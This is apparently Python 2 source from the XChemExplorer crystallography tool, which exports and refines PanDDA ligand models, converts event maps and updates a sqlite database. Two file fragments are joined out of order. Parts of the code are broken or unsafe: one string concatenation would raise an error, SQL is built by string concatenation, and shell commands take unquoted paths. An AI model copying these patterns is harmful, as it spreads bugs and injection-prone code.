self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'replacing symlink for {0!s} with real file'.format(files))
self.Logfile.insert('replacing symlink for {0!s} with real file'.format(files))
os.system('cp --remove-destination {0!s} {1!s}/ligand_files'.format(os.path.realpath(files), xtal))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
XChemToolTips.run_pandda_inspect_at_home(self.panddaDir)
class convert_apo_structures_to_mmcif(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def sf_convert_environment(self):
pdb_extract_init = ''
if os.path.isdir('/dls'):
pdb_extract_init = 'source /dls/science/groups/i04-1/software/pdb-extract-prod/setup.sh\n'
pdb_extract_init += '/dls/science/groups/i04-1/software/pdb-extract-prod/bin/sf_convert'
else:
pdb_extract_init = 'source ' + os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/setup.sh') + '\n'
pdb_extract_init += +os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/bin/sf_convert')
return pdb_extract_init
def run(self):
self.Logfile.insert('converting apo structures in pandda directory to mmcif files')
self.Logfile.insert('chanfing to '+self.panddaDir)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob(os.path.join(self.panddaDir,'processed_datasets','*'))))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
pdb_extract_init = self.sf_convert_environment()
self.Logfile.insert('parsing '+self.panddaDir)
for dirs in glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')):
xtal = dirs[dirs.rfind('/')+1:]
self.Logfile.insert('%s: converting %s to mmcif' %(xtal,xtal+'-pandda-input.mtz'))
if os.path.isfile(os.path.join(dirs,xtal+'-pandda-input.mtz')):
if os.path.isfile(os.path.join(dirs,xtal+'_sf.mmcif')):
self.Logfile.insert('%s: %s_sf.mmcif exists; skipping...' %(xtal,xtal))
else:
os.chdir(dirs)
Cmd = (pdb_extract_init +
' -o mmcif'
' -sf %s' % xtal+'-pandda-input.mtz' +
' -out {0!s}_sf.mmcif > {1!s}.sf_mmcif.log'.format(xtal, xtal))
self.Logfile.insert('running command: '+Cmd)
os.system(Cmd)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class check_number_of_modelled_ligands(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,db_file):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.db=XChemDB.data_source(db_file)
self.errorDict={}
def update_errorDict(self,xtal,message):
if xtal not in self.errorDict:
self.errorDict[xtal]=[]
self.errorDict[xtal].append(message)
def insert_new_row_in_panddaTable(self,xtal,ligand,site,dbDict):
resname= site[0]
chain= site[1]
seqnum= site[2]
altLoc= site[3]
x_site= site[5][0]
y_site= site[5][1]
z_site= site[5][2]
resnameSimilarSite= ligand[0]
chainSimilarSite= ligand[1]
seqnumSimilarSite= ligand[2]
siteList=[]
for entry in dbDict[xtal]:
siteList.append(str(entry[0]))
if entry[4] == resnameSimilarSite and entry[5] == chainSimilarSite and entry[6] == seqnumSimilarSite:
eventMap= str(entry[7])
eventMap_mtz= str(entry[8])
initialPDB= str(entry[9])
initialMTZ= str(entry[10])
event_id= str(entry[12])
PanDDApath= str(entry[13])
db_dict={
'PANDDA_site_index': str(int(max(siteList))+1),
'PANDDApath': PanDDApath,
'PANDDA_site_ligand_id': resname+'-'+chain+'-'+seqnum,
'PANDDA_site_ligand_resname': resname,
'PANDDA_site_ligand_chain': chain,
'PANDDA_site_ligand_sequence_number': seqnum,
'PANDDA_site_ligand_altLoc': 'D',
'PANDDA_site_event_index': event_id,
'PANDDA_site_event_map': eventMap,
'PANDDA_site_event_map_mtz': eventMap_mtz,
'PANDDA_site_initial_model': initialPDB,
'PANDDA_site_initial_mtz': initialMTZ,
'PANDDA_site_ligand_placed': 'True',
'PANDDA_site_x': x_site,
'PANDDA_site_y': y_site,
'PANDDA_site_z': z_site }
print xtal,db_dict
def run(self):
self.Logfile.insert('reading modelled ligands from panddaTable')
dbDict={}
sqlite = ( "select "
" CrystalName,"
" PANDDA_site_index,"
" PANDDA_site_x,"
" PANDDA_site_y,"
" PANDDA_site_z,"
" PANDDA_site_ligand_resname,"
" PANDDA_site_ligand_chain,"
" PANDDA_site_ligand_sequence_number,"
" PANDDA_site_event_map,"
" PANDDA_site_event_map_mtz,"
" PANDDA_site_initial_model,"
" PANDDA_site_initial_mtz,"
" RefinementOutcome,"
" PANDDA_site_event_index,"
" PANDDApath "
"from panddaTable " )
dbEntries=self.db.execute_statement(sqlite)
for item in dbEntries:
xtal= str(item[0])
site= str(item[1])
x= str(item[2])
y= str(item[3])
z= str(item[4])
resname= str(item[5])
chain= str(item[6])
seqnum= str(item[7])
eventMap= str(item[8])
eventMap_mtz= str(item[9])
initialPDB= str(item[10])
initialMTZ= str(item[11])
outcome= str(item[12])
event= str(item[13])
PanDDApath= str(item[14])
if xtal not in dbDict:
dbDict[xtal]=[]
dbDict[xtal].append([site,x,y,z,resname,chain,seqnum,eventMap,eventMap_mtz,initialPDB,initialMTZ,outcome,event,PanDDApath])
os.chdir(self.project_directory)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for xtal in sorted(glob.glob('*')):
if os.path.isfile(os.path.join(xtal,'refine.pdb')):
ligands=XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).ligand_details_as_list()
self.Logfile.insert('{0!s}: found file refine.pdb'.format(xtal))
if ligands:
if os.path.isdir(os.path.join(xtal,'xceTmp')):
os.system('/bin/rm -fr {0!s}'.format(os.path.join(xtal,'xceTmp')))
os.mkdir(os.path.join(xtal,'xceTmp'))
else:
self.Logfile.warning('{0!s}: cannot find ligand molecule in refine.pdb; skipping...'.format(xtal))
continue
made_sym_copies=False
ligands_not_in_panddaTable=[]
for n,item in enumerate(ligands):
resnameLIG= item[0]
chainLIG= item[1]
seqnumLIG= item[2]
altLocLIG= item[3]
occupancyLig= item[4]
if altLocLIG.replace(' ','') == '':
self.Logfile.insert(xtal+': found a ligand not modelled with pandda.inspect -> {0!s} {1!s} {2!s}'.format(resnameLIG, chainLIG, seqnumLIG))
residue_xyz = XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).get_center_of_gravity_of_residue_ish(item[1],item[2])
ligands[n].append(residue_xyz)
foundLigand=False
if xtal in dbDict:
for entry in dbDict[xtal]:
resnameTable=entry[4]
chainTable=entry[5]
seqnumTable=entry[6]
self.Logfile.insert('panddaTable: {0!s} {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
if resnameLIG == resnameTable and chainLIG == chainTable and seqnumLIG == seqnumTable:
self.Logfile.insert('{0!s}: found ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
foundLigand=True
if not foundLigand:
self.Logfile.error('{0!s}: did NOT find ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameLIG, chainLIG, seqnumLIG))
ligands_not_in_panddaTable.append([resnameLIG,chainLIG,seqnumLIG,altLocLIG,occupancyLig,residue_xyz])
else:
self.Logfile.warning('ligand in PDB file, but dataset not listed in panddaTable: {0!s} -> {1!s} {2!s} {3!s}'.format(xtal, item[0], item[1], item[2]))
for entry in ligands_not_in_panddaTable:
self.Logfile.error('{0!s}: refine.pdb contains a ligand that is not assigned in the panddaTable: {1!s} {2!s} {3!s} {4!s}'.format(xtal, entry[0], entry[1], entry[2], entry[3]))
for site in ligands_not_in_panddaTable:
for files in glob.glob(os.path.join(self.project_directory,xtal,'xceTmp','ligand_*_*.pdb')):
mol_xyz = XChemUtils.pdbtools(files).get_center_of_gravity_of_molecule_ish()
# now need to check if there is a unassigned entry in panddaTable that is close
for entry in dbDict[xtal]:
distance = XChemUtils.misc().calculate_distance_between_coordinates(mol_xyz[0], mol_xyz[1],mol_xyz[2],entry[1],entry[2], entry[3])
self.Logfile.insert('{0!s}: {1!s} {2!s} {3!s} <---> {4!s} {5!s} {6!s}'.format(xtal, mol_xyz[0], mol_xyz[1], mol_xyz[2], entry[1], entry[2], entry[3]))
self.Logfile.insert('{0!s}: symm equivalent molecule: {1!s}'.format(xtal, files))
self.Logfile.insert('{0!s}: distance: {1!s}'.format(xtal, str(distance)))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
if self.errorDict != {}:
self.update_errorDict('General','The aforementioned PDB files were automatically changed by XCE!\nPlease check and refine them!!!')
self.emit(QtCore.SIGNAL('show_error_dict'), self.errorDict)
class find_event_map_for_ligand(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,external_software):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.external_software=external_software
try:
import gemmi
self.Logfile.insert('found gemmi library in ccp4-python')
except ImportError:
self.external_software['gemmi'] = False
self.Logfile.warning('cannot import gemmi; will use phenix.map_to_structure_factors instead')
def run(self):
self.Logfile.insert('======== checking ligand CC in event maps ========')
for dirs in sorted(glob.glob(os.path.join(self.project_directory,'*'))):
xtal = dirs[dirs.rfind('/')+1:]
if os.path.isfile(os.path.join(dirs,'refine.pdb')) and \
os.path.isfile(os.path.join(dirs,'refine.mtz')):
self.Logfile.insert('%s: found refine.pdb' %xtal)
os.chdir(dirs)
try:
p = gemmi.read_structure('refine.pdb')
except:
self.Logfile.error('gemmi library not available')
self.external_software['gemmi'] = False
reso = XChemUtils.mtztools('refine.mtz').get_dmin()
ligList = XChemUtils.pdbtools('refine.pdb').save_residues_with_resname(dirs,'LIG')
self.Logfile.insert('%s: found %s ligands of type LIG in refine.pdb' %(xtal,str(len(ligList))))
for maps in glob.glob(os.path.join(dirs,'*event*.native.ccp4')):
if self.external_software['gemmi']:
self.convert_map_to_sf_with_gemmi(maps,p)
else:
self.expand_map_to_p1(maps)
self.convert_map_to_sf(maps.replace('.ccp4','.P1.ccp4'),reso)
summary = ''
for lig in sorted(ligList):
if self.external_software['gemmi']:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
else:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native*P1.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
self.Logfile.insert('\nsummary of CC analysis:\n======================:\n'+summary)
def expand_map_to_p1(self,emap):
self.Logfile.insert('expanding map to P1: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.P1.ccp4')):
self.Logfile.warning('P1 map exists; skipping...')
return
cmd = ( 'mapmask MAPIN %s MAPOUT %s << eof\n' %(emap,emap.replace('.ccp4','.P1.ccp4'))+
' XYZLIM CELL\n'
' PAD 0.0\n'
' SYMMETRY 1\n'
'eof\n' )
os.system(cmd)
def convert_map_to_sf(self,emap,reso):
self.Logfile.insert('converting ccp4 map to mtz with phenix.map_to_structure_factors: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.map_to_structure_factors %s d_min=%s\n' %(emap,reso)+
'/bin/mv map_to_structure_factors.mtz %s' %emap.replace('.ccp4', '.mtz') )
os.system(cmd)
def get_lig_cc(self,mtz,lig):
self.Logfile.insert('calculating CC for %s in %s' %(lig,mtz))
if os.path.isfile(mtz.replace('.mtz', '_CC.log')):
self.Logfile.warning('logfile of CC analysis exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.get_cc_mtz_pdb %s %s > %s' % (mtz, lig, mtz.replace('.mtz', '_CC.log')) )
os.system(cmd)
def check_lig_cc(self,log):
cc = 'n/a'
if os.path.isfile(log):
for line in open(log):
if line.startswith('local'):
cc = line.split()[len(line.split()) - 1]
else:
self.Logfile.error('logfile does not exist: %s' %log)
return cc
def convert_map_to_sf_with_gemmi(self,emap,p):
self.Logfile.insert('converting ccp4 map to mtz with gemmi map2sf: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = 'gemmi map2sf %s %s FWT PHWT --dmin=%s' %(emap,emap.replace('.ccp4','.mtz'),p.resolution)
self.Logfile.insert('converting map with command:\n' + cmd)
os.system(cmd) | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
from PyQt4 import QtGui, QtCore
import math
#from XChemUtils import mtztools
import XChemDB
import XChemRefine
import XChemUtils
import XChemLog
import XChemToolTips
import csv
try:
import gemmi
import pandas
except ImportError:
pass
#def get_names_of_current_clusters(xce_logfile,panddas_directory):
# Logfile=XChemLog.updateLog(xce_logfile)
# Logfile.insert('parsing {0!s}/cluster_analysis'.format(panddas_directory))
# os.chdir('{0!s}/cluster_analysis'.format(panddas_directory))
# cluster_dict={}
# for out_dir in sorted(glob.glob('*')):
# if os.path.isdir(out_dir):
# cluster_dict[out_dir]=[]
# found_first_pdb=False
# for folder in glob.glob(os.path.join(out_dir,'pdbs','*')):
# xtal=folder[folder.rfind('/')+1:]
# if not found_first_pdb:
# if os.path.isfile(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb') ):
# cluster_dict[out_dir].append(os.path.join(panddas_directory,'cluster_analysis',out_dir,'pdbs',xtal,xtal+'.pdb'))
# found_first_pdb=True
# cluster_dict[out_dir].append(xtal)
# return cluster_dict
class export_and_refine_ligand_bound_models(QtCore.QThread):
def __init__(self,PanDDA_directory,datasource,project_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.PanDDA_directory = PanDDA_directory
self.datasource = datasource
self.db = XChemDB.data_source(self.datasource)
self.Logfile = XChemLog.updateLog(xce_logfile)
self.xce_logfile = xce_logfile
self.project_directory = project_directory
self.which_models=which_models
self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.initial_model_directory=initial_model_directory
# self.db.create_missing_columns()
# self.db_list=self.db.get_empty_db_dict()
# self.external_software=XChemUtils.external_software(xce_logfile).check()
# self.xce_logfile=xce_logfile
# self.already_exported_models=[]
def run(self):
self.Logfile.warning(XChemToolTips.pandda_export_ligand_bound_models_only_disclaimer())
# find all folders with *-pandda-model.pdb
modelsDict = self.find_modeled_structures_and_timestamps()
# if only NEW models shall be exported, check timestamps
if not self.which_models.startswith('all'):
modelsDict = self.find_new_models(modelsDict)
# find pandda_inspect_events.csv and read in as pandas dataframe
inspect_csv = None
if os.path.isfile(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv')):
inspect_csv = pandas.read_csv(os.path.join(self.PanDDA_directory,'analyses','pandda_inspect_events.csv'))
progress = 0
try:
progress_step = float(1/len(modelsDict))
except TypeError:
self.Logfile.error('DID NOT FIND ANY MODELS TO EXPORT')
return None
for xtal in sorted(modelsDict):
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
pandda_model = os.path.join('modelled_structures',xtal + '-pandda-model.pdb')
pdb = gemmi.read_structure(pandda_model)
# find out ligand event map relationship
ligandDict = XChemUtils.pdbtools_gemmi(pandda_model).center_of_mass_ligand_dict('LIG')
if ligandDict == {}:
self.Logfile.error(xtal + ': cannot find ligand of type LIG; skipping...')
continue
self.show_ligands_in_model(xtal,ligandDict)
emapLigandDict = self.find_ligands_matching_event_map(inspect_csv,xtal,ligandDict)
self.Logfile.warning('emapLigandDict' + str(emapLigandDict))
# convert event map to SF
self.event_map_to_sf(pdb.resolution,emapLigandDict)
# move existing event maps in project directory to old folder
self.move_old_event_to_backup_folder(xtal)
# copy event MTZ to project directory
self.copy_event_mtz_to_project_directory(xtal)
# copy pandda-model to project directory
self.copy_pandda_model_to_project_directory(xtal)
# make map from MTZ and cut around ligand
self.make_and_cut_map(xtal,emapLigandDict)
# update database
self.update_database(xtal,modelsDict)
# refine models
self.refine_exported_model(xtal)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
def update_database(self,xtal,modelsDict):
db_dict = {}
timestamp_file = modelsDict[xtal]
db_dict['DatePanDDAModelCreated'] = timestamp_file
db_dict['RefinementOutcome'] = '3 - In Refinement'
self.Logfile.insert('updating database for '+xtal+' setting time model was created to '+db_dict['DatePanDDAModelCreated'])
self.db.update_data_source(xtal,db_dict)
def make_and_cut_map(self,xtal,emapLigandDict):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
XChemUtils.pdbtools_gemmi(xtal + '-pandda-model.pdb').save_ligands_to_pdb('LIG')
for ligID in emapLigandDict:
m = emapLigandDict[ligID]
emtz = m.replace('.ccp4','_' + ligID + '.mtz')
emap = m.replace('.ccp4','_' + ligID + '.ccp4')
XChemUtils.maptools().calculate_map(emtz,'FWT','PHWT')
XChemUtils.maptools().cut_map_around_ligand(emap,ligID+'.pdb','7')
if os.path.isfile(emap.replace('.ccp4','_mapmask.ccp4')):
os.system('/bin/mv %s %s_%s_event.ccp4' %(emap.replace('.ccp4','_mapmask.ccp4'),xtal,ligID))
os.system('ln -s %s_%s_event.ccp4 %s_%s_event_cut.ccp4' %(xtal,ligID,xtal,ligID))
def copy_pandda_model_to_project_directory(self,xtal):
os.chdir(os.path.join(self.project_directory,xtal))
model = os.path.join(self.PanDDA_directory,'processed_datasets',xtal,'modelled_structures',xtal+'-pandda-model.pdb')
self.Logfile.insert('copying %s to project directory' %model)
os.system('/bin/cp %s .' %model)
def copy_event_mtz_to_project_directory(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
os.chdir(os.path.join(self.PanDDA_directory,'processed_datasets',xtal))
for emap in glob.glob('*-BDC_*.mtz'):
self.Logfile.insert('copying %s to %s...' %(emap,os.path.join(self.project_directory,xtal)))
os.system('/bin/cp %s %s' %(emap,os.path.join(self.project_directory,xtal)))
def move_old_event_to_backup_folder(self,xtal):
self.Logfile.insert('changing directory to ' + os.path.join(self.project_directory,xtal))
os.chdir(os.path.join(self.project_directory,xtal))
if not os.path.isdir('event_map_backup'):
os.mkdir('event_map_backup')
self.Logfile.insert('moving existing event maps to event_map_backup')
for emap in glob.glob('*-BDC_*.ccp4'):
os.system('/bin/mv %s event_map_backup/%s' %(emap,emap+'.'+str(datetime.now()).replace(' ','_').replace(':','-')))
def show_ligands_in_model(self,xtal,ligandDict):
self.Logfile.insert(xtal + ': found the following ligands...')
for lig in ligandDict:
self.Logfile.insert(lig + ' -> coordinates ' + str(ligandDict[lig]))
def find_modeled_structures_and_timestamps(self):
self.Logfile.insert('finding out modelled structures in ' + self.PanDDA_directory)
modelsDict={}
for model in sorted(glob.glob(os.path.join(self.PanDDA_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb'))):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
modelsDict[sample]=timestamp
return modelsDict
def find_new_models(self,modelsDict):
samples_to_export = {}
self.Logfile.hint('XCE will never export/ refine models that are "5-deposition ready" or "6-deposited"')
self.Logfile.hint('Please change the RefinementOutcome flag in the Refinement table if you wish to re-export them')
self.Logfile.insert('checking timestamps of models in database...')
for xtal in modelsDict:
timestamp_file = modelsDict[xtal]
db_query=self.db.execute_statement("select DatePanDDAModelCreated from mainTable where CrystalName is '"+xtal+"' and (RefinementOutcome like '3%' or RefinementOutcome like '4%')")
try:
timestamp_db=str(db_query[0][0])
except IndexError:
self.Logfile.warning('%s: database query gave no results for DatePanDDAModelCreated; skipping...' %xtal)
self.Logfile.warning('%s: this might be a brand new model; will continue with export!' %xtal)
samples_to_export[xtal]=timestamp_file
timestamp_db = "2100-01-01 00:00:00" # some time in the future...
try:
difference=(datetime.strptime(timestamp_file,'%Y-%m-%d %H:%M:%S') - datetime.strptime(timestamp_db,'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+xtal+' -> was already refined, but newer PanDDA model available')
samples_to_export[xtal]=timestamp_file
else:
self.Logfile.insert('%s: model has not changed since it was created on %s' %(xtal,timestamp_db))
except (ValueError, IndexError), e:
self.Logfile.error(str(e))
return samples_to_export
def event_map_to_sf(self,resolution,emapLigandDict):
for lig in emapLigandDict:
emap = emapLigandDict[lig]
emtz = emap.replace('.ccp4','.mtz')
emtz_ligand = emap.replace('.ccp4','_' + lig + '.mtz')
self.Logfile.insert('trying to convert %s to SF -> %s' %(emap,emtz_ligand))
self.Logfile.insert('>>> ' + emtz)
XChemUtils.maptools_gemmi(emap).map_to_sf(resolution)
if os.path.isfile(emtz):
os.system('/bin/mv %s %s' %(emtz,emtz_ligand))
self.Logfile.insert('success; %s exists' %emtz_ligand)
else:
self.Logfile.warning('something went wrong; %s could not be created...' %emtz_ligand)
def find_ligands_matching_event_map(self,inspect_csv,xtal,ligandDict):
emapLigandDict = {}
for index, row in inspect_csv.iterrows():
if row['dtag'] == xtal:
for emap in glob.glob('*-BDC_*.ccp4'):
self.Logfile.insert('checking if event and ligand are within 7A of each other')
x = float(row['x'])
y = float(row['y'])
z = float(row['z'])
matching_ligand = self.calculate_distance_to_ligands(ligandDict,x,y,z)
if matching_ligand is not None:
emapLigandDict[matching_ligand] = emap
self.Logfile.insert('found matching ligand (%s) for %s' %(matching_ligand,emap))
break
else:
self.Logfile.warning('current ligand not close to event...')
if emapLigandDict == {}:
self.Logfile.error('could not find ligands within 7A of PanDDA events')
return emapLigandDict
def calculate_distance_to_ligands(self,ligandDict,x,y,z):
matching_ligand = None
p_event = gemmi.Position(x, y, z)
for ligand in ligandDict:
c = ligandDict[ligand]
p_ligand = gemmi.Position(c[0], c[1], c[2])
self.Logfile.insert('coordinates ligand: ' + str(c[0])+' '+ str(c[1])+' '+str(c[2]))
self.Logfile.insert('coordinates event: ' + str(x)+' '+ str(y)+' '+str(z))
distance = p_event.dist(p_ligand)
self.Logfile.insert('distance between ligand and event: %s A' %str(distance))
if distance < 7:
matching_ligand = ligand
break
return matching_ligand
def refine_exported_model(self,xtal):
RefmacParams={ 'HKLIN': '', 'HKLOUT': '',
'XYZIN': '', 'XYZOUT': '',
'LIBIN': '', 'LIBOUT': '',
'TLSIN': '', 'TLSOUT': '',
'TLSADD': '',
'NCYCLES': '10',
'MATRIX_WEIGHT': 'AUTO',
'BREF': ' bref ISOT\n',
'TLS': '',
'NCS': '',
'TWIN': '',
'WATER': '',
'LIGOCC': '',
'SANITY': '' }
if 'nocheck' in self.which_models:
RefmacParams['SANITY'] = 'off'
self.Logfile.insert('trying to refine ' + xtal + '...')
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.project_directory,xtal)
if not os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.project_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.project_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.project_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),RefmacParams,self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
else:
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.project_directory, xtal)))
class refine_bound_state_with_buster(QtCore.QThread):
def __init__(self,panddas_directory,datasource,initial_model_directory,xce_logfile,which_models):
QtCore.QThread.__init__(self)
self.panddas_directory=panddas_directory
self.datasource=datasource
self.initial_model_directory=initial_model_directory
self.db=XChemDB.data_source(self.datasource)
self.db.create_missing_columns()
self.db_list=self.db.get_empty_db_dict()
self.external_software=XChemUtils.external_software(xce_logfile).check()
self.xce_logfile=xce_logfile
self.Logfile=XChemLog.updateLog(xce_logfile)
self.which_models=which_models
self.already_exported_models=[]
def run(self):
samples_to_export=self.export_models()
self.refine_exported_models(samples_to_export)
def refine_exported_models(self,samples_to_export):
self.Logfile.insert('will try to refine the following crystals:')
for xtal in sorted(samples_to_export):
self.Logfile.insert(xtal)
for xtal in sorted(samples_to_export):
self.Logfile.insert('%s: getting compound code from database' %xtal)
query=self.db.execute_statement("select CompoundCode from mainTable where CrystalName='%s';" %xtal)
compoundID=str(query[0][0])
self.Logfile.insert('%s: compounds code = %s' %(xtal,compoundID))
# compoundID=str(item[1])
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'.free.mtz')):
if os.path.isfile(os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb')):
self.Logfile.insert('running inital refinement on PANDDA model of '+xtal)
Serial=XChemRefine.GetSerial(self.initial_model_directory,xtal)
#######################################################
if not os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut')):
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut'))
# create folder for new refinement cycle
if os.path.isdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial))):
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
else:
os.mkdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.chdir(os.path.join(self.initial_model_directory,xtal,'cootOut','Refine_'+str(Serial)))
os.system('/bin/cp %s in.pdb' %os.path.join(self.initial_model_directory,xtal,xtal+'-pandda-model.pdb'))
Refine=XChemRefine.Refine(self.initial_model_directory,xtal,compoundID,self.datasource)
Refine.RunBuster(str(Serial),self.external_software,self.xce_logfile,None)
else:
self.Logfile.error('%s: cannot find %s-pandda-model.pdb; cannot start refinement...' %(xtal,xtal))
elif xtal in samples_to_export and not os.path.isfile(
os.path.join(self.initial_model_directory, xtal, xtal + '.free.mtz')):
self.Logfile.error('%s: cannot start refinement because %s.free.mtz is missing in %s' % (
xtal, xtal, os.path.join(self.initial_model_directory, xtal)))
else:
self.Logfile.insert('%s: nothing to refine' % (xtal))
def export_models(self):
self.Logfile.insert('finding out which PanDDA models need to be exported')
# first find which samples are in interesting datasets and have a model
# and determine the timestamp
fileModelsDict={}
queryModels=''
for model in glob.glob(os.path.join(self.panddas_directory,'processed_datasets','*','modelled_structures','*-pandda-model.pdb')):
sample=model[model.rfind('/')+1:].replace('-pandda-model.pdb','')
timestamp=datetime.fromtimestamp(os.path.getmtime(model)).strftime('%Y-%m-%d %H:%M:%S')
self.Logfile.insert(sample+'-pandda-model.pdb was created on '+str(timestamp))
queryModels+="'"+sample+"',"
fileModelsDict[sample]=timestamp
# now get these models from the database and compare the datestamps
# Note: only get the models that underwent some form of refinement,
# because only if the model was updated in pandda.inspect will it be exported and refined
dbModelsDict={}
if queryModels != '':
dbEntries=self.db.execute_statement("select CrystalName,DatePanDDAModelCreated from mainTable where CrystalName in ("+queryModels[:-1]+") and (RefinementOutcome like '3%' or RefinementOutcome like '4%' or RefinementOutcome like '5%')")
for item in dbEntries:
xtal=str(item[0])
timestamp=str(item[1])
dbModelsDict[xtal]=timestamp
self.Logfile.insert('PanDDA model for '+xtal+' is in database and was created on '+str(timestamp))
# compare timestamps and only export the ones where the timestamp of the file is newer than the one in the DB
samples_to_export={}
self.Logfile.insert('checking which PanDDA models were newly created or updated')
if self.which_models=='all':
self.Logfile.insert('Note: you chose to export ALL available PanDDA!')
for sample in fileModelsDict:
if self.which_models=='all':
self.Logfile.insert('exporting '+sample)
samples_to_export[sample]=fileModelsDict[sample]
else:
if sample in dbModelsDict:
try:
difference=(datetime.strptime(fileModelsDict[sample],'%Y-%m-%d %H:%M:%S') - datetime.strptime(dbModelsDict[sample],'%Y-%m-%d %H:%M:%S') )
if difference.seconds != 0:
self.Logfile.insert('exporting '+sample+' -> was already refined, but newer PanDDA model available')
samples_to_export[sample]=fileModelsDict[sample]
except ValueError:
# this will be raised if timestamp is not properly formatted;
# which will usually be the case when respective field in database is blank
# these are hopefully legacy cases which are from before this extensive check was introduced (13/01/2017)
advice = ( 'The pandda model of '+xtal+' was changed, but it was already refined! '
'This is most likely because this was done with an older version of XCE. '
'If you really want to export and refine this model, you need to open the database '
'with DBbroweser (sqlitebrowser.org); then change the RefinementOutcome field '
'of the respective sample to "2 - PANDDA model", save the database and repeat the export prodedure.' )
self.Logfile.insert(advice)
else:
self.Logfile.insert('exporting '+sample+' -> first time to be exported and refined')
samples_to_export[sample]=fileModelsDict[sample]
# update the DB:
